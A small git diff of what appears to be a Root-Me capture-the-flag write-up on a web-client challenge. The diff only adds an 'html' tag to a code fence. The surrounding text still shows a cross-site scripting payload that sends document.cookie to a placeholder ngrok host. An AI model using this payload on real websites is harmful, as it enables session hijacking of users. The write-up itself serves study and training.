--- a/_posts/rootme/web-client/2022-04-11-medium.md
+++ b/_posts/rootme/web-client/2022-04-11-medium.md
@@ -20,6 +20,6 @@ $ php -S localhost:80
 ```
 
 In the web, the following payload:
-```
+```html
 <script>document.write('<img src="https://{ngrok-ip}/?cookie='+document.cookie+'" />')</script>
 ```
